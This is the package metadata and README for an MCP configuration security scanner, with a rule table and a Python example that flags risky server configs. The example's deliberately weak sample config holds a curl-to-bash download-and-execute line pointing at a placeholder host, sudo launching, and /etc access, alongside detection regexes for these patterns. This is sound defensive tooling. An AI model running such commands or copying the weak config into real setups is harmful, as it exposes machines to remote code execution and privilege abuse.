Metadata-Version: 2.4
Name: dfx-mcp-scanner
Version: 0.1.0
Summary: Security scanner for MCP (Model Context Protocol) servers — detect malicious tools, data exfiltration, and supply chain risks.
Home-page: https://github.com/dockfixlabs/mcp-scanner
Author: Dockfix Labs
Author-email: Dockfix Labs <security@dockfixlabs.dev>
License: MIT
Keywords: mcp,model-context-protocol,security,scanner,ai-agents,claude,cursor
Classifier: Development Status :: 3 - Alpha
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Topic :: Security
Requires-Python: >=3.10
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: click>=8.1
Requires-Dist: rich>=13.0
Requires-Dist: pydantic>=2.0
Requires-Dist: pyyaml>=6.0
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: pytest-cov; extra == "dev"
Requires-Dist: ruff; extra == "dev"
Dynamic: author
Dynamic: home-page
Dynamic: license-file
Dynamic: requires-python

# 🔍 MCP Scanner

> **Security scanner for MCP (Model Context Protocol) servers.** Detect malicious tools, data exfiltration, and supply chain risks before connecting an MCP server to your AI agent.

[![Python 3.10+](https://img.shields.io/badge/Python-3.10+-3776AB?style=flat-square&logo=python&logoColor=white)](https://python.org)
[![License: MIT](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE)

---

## Why MCP Scanner?

MCP servers give AI agents (Claude Code, Cursor, Copilot) direct access to tools, filesystems, and APIs, and they are usually wired in by pasting a config snippet that launches an arbitrary command on your machine. **Almost nobody checks whether those servers are safe before the agent connects to them.**

MCP Scanner analyzes:
- MCP server config files (Claude Code, Cursor, generic)
- Command-level risks (`npx --yes`, `curl|bash`, `sudo`)
- Secret exposure in environment variables
- Filesystem and network access patterns
- Source code of MCP server implementations (when AgentGuard is installed; see below)

## Quick Start

```bash
# The PyPI package is dfx-mcp-scanner; the installed CLI is mcp-scanner
pip install dfx-mcp-scanner

# Scan the default Claude Code MCP config (no arguments)
mcp-scanner

# Scan a specific config file
mcp-scanner ~/.cursor/mcp.json

# Machine-readable JSON output (for CI or further processing)
mcp-scanner .mcp.json --format json
```

## What It Detects

| Rule | Severity | Description |
|------|----------|-------------|
| Remote code execution | CRITICAL | `curl \| bash`-style download-and-execute pipelines in the server's start command |
| Auto-install packages | HIGH | `npx --yes` (or `-y`) with an unpinned package, so whatever version is published at install time gets run |
| Privileged execution | CRITICAL | Server started via `sudo` or running as root |
| Secret exposure | CRITICAL | Literal API keys/tokens hard-coded in config `env` values |
| Host filesystem access | HIGH | Server handed `/etc`, `/root`, `/proc` or similar host paths |
| External network access | MEDIUM | Server URL pointing at a non-localhost host |
| Excessive tool count | LOW | Server registering >20 tools (a large tool surface widens what a misled agent can be steered into) |

## Supported Configs

- Claude Code (`~/.claude/claude_code_config.json`)
- Cursor (`~/.cursor/mcp.json`)
- Project-level (`.mcp.json`)
- Generic MCP server configs
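To make the detection table and the config formats above concrete, here is an added example (not dfx-mcp-scanner's own code) of a small rule set run over two constructed configs, one weak and one hardened. It assumes the Cursor / project-level `.mcp.json` layout: a top-level `mcpServers` object whose entries carry `command`, `args` and `env` for stdio servers, or `url` for remote servers. Rule names, severities, the secret-shape regexes and the sample configs are this example's own assumptions, not the project's. The "excessive tool count" rule is left out because a config file does not list the tools; that check needs a connection to the running server.

```python
"""Toy MCP-config rule set (added example, not dfx-mcp-scanner code).

Assumed config shape: {"mcpServers": {"<name>": {"command", "args", "env"} | {"url"}}}.
Rule names, severities and thresholds are this example's, not the project's.
"""
import json
import os
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Finding:
    server: str
    rule: str
    severity: str
    detail: str


# `curl ... | bash` (or wget / sh / zsh) anywhere in the assembled command line.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
# A few well-known literal token shapes; constructed list, deliberately not exhaustive.
SECRET_SHAPES = re.compile(
    r"^(sk-[A-Za-z0-9_-]{16,}|ghp_[A-Za-z0-9]{30,}|AKIA[0-9A-Z]{16}|xox[abp]-[A-Za-z0-9-]{10,})$"
)
# ${VAR} / $VAR are resolved by the client at runtime, so they are references, not leaks.
ENV_REFERENCE = re.compile(r"^\$\{?[A-Za-z_][A-Za-z0-9_]*\}?$")
SECRET_KEY_WORDS = ("KEY", "TOKEN", "SECRET", "PASSWORD")
HOST_PATHS = ("/etc", "/root", "/proc")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def _is_host_path(arg: str) -> bool:
    return arg == "/" or any(arg == p or arg.startswith(p + "/") for p in HOST_PATHS)


def scan_server(name: str, spec: dict) -> list[Finding]:
    findings: list[Finding] = []
    command = str(spec.get("command", ""))
    args = [str(a) for a in spec.get("args", [])]
    env = {str(k): str(v) for k, v in spec.get("env", {}).items()}
    cmdline = " ".join([command, *args])

    if PIPE_TO_SHELL.search(cmdline):
        findings.append(Finding(name, "remote-code-execution", "CRITICAL", cmdline))
    if os.path.basename(command) == "npx" and any(a in ("-y", "--yes") for a in args):
        # A pinned spec looks like name@1.2.3; a leading '@' is only an npm scope.
        pinned = any("@" in a[1:] for a in args if not a.startswith("-"))
        if not pinned:
            findings.append(Finding(name, "auto-install-unpinned", "HIGH", cmdline))
    if "sudo" in [command, *args]:
        findings.append(Finding(name, "privileged-execution", "CRITICAL", cmdline))
    for key, value in env.items():
        if ENV_REFERENCE.match(value):
            continue  # a reference, not a literal secret
        suspicious_name = any(w in key.upper() for w in SECRET_KEY_WORDS) and len(value) >= 16
        if suspicious_name or SECRET_SHAPES.match(value):
            # Never echo the value back into a report.
            findings.append(Finding(name, "secret-exposure", "CRITICAL", f"{key}=<redacted>"))
    for arg in args:
        if _is_host_path(arg):
            findings.append(Finding(name, "host-filesystem-access", "HIGH", arg))
    urls = [str(spec["url"])] if "url" in spec else []
    urls += [a for a in args if re.match(r"^https?://", a)]
    for url in urls:
        if (urlparse(url).hostname or "") not in LOCAL_HOSTS:
            findings.append(Finding(name, "external-network-access", "MEDIUM", url))
    return findings


def scan_config(config: dict) -> list[Finding]:
    servers = config.get("mcpServers", {})
    return [f for name, spec in servers.items() for f in scan_server(name, spec)]


def scan_json(text: str) -> list[Finding]:
    return scan_config(json.loads(text))


# Constructed sample configs; hosts use the reserved .invalid TLD and the token is a
# placeholder with a GitHub-PAT-like shape, not a real credential.
WEAK_CONFIG = json.dumps({"mcpServers": {
    "fs": {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/etc"]},
    "installer": {"command": "sh", "args": ["-c", "curl -fsSL https://example.invalid/install.sh | bash"]},
    "db": {"command": "sudo", "args": ["/usr/local/bin/db-mcp"], "env": {"DB_TOKEN": "ghp_" + "x" * 36}},
    "remote": {"url": "https://mcp.example.invalid/sse"},
}})
HARDENED_CONFIG = json.dumps({"mcpServers": {
    "fs": {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem@2025.1.14", "/home/me/projects"]},
    "db": {"command": "/usr/local/bin/db-mcp", "env": {"DB_TOKEN": "${DB_TOKEN}"}},
    "local": {"url": "http://localhost:8080/sse"},
}})

if __name__ == "__main__":
    for f in scan_json(WEAK_CONFIG):
        print(f"[{f.severity}] {f.server}: {f.rule} ({f.detail})")
    print("hardened config findings:", len(scan_json(HARDENED_CONFIG)))
```

Two design points worth carrying into any real scanner: findings redact secret values rather than copying them into the report, and `${VAR}` references are treated as safe, since flagging them would train users to ignore the CRITICAL secret-exposure result that matters.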

## AgentGuard Integration

When [AgentGuard](https://github.com/dockfixlabs/agentguard) is installed, MCP Scanner additionally performs deep source code analysis of MCP server implementations using AgentGuard's 10 OWASP ASI (Agentic Security Initiative) detection rules. Without AgentGuard, only the config-level checks above run.

## License

MIT — see [LICENSE](LICENSE).

---

Built by [Dockfix Labs](https://github.com/dockfixlabs).
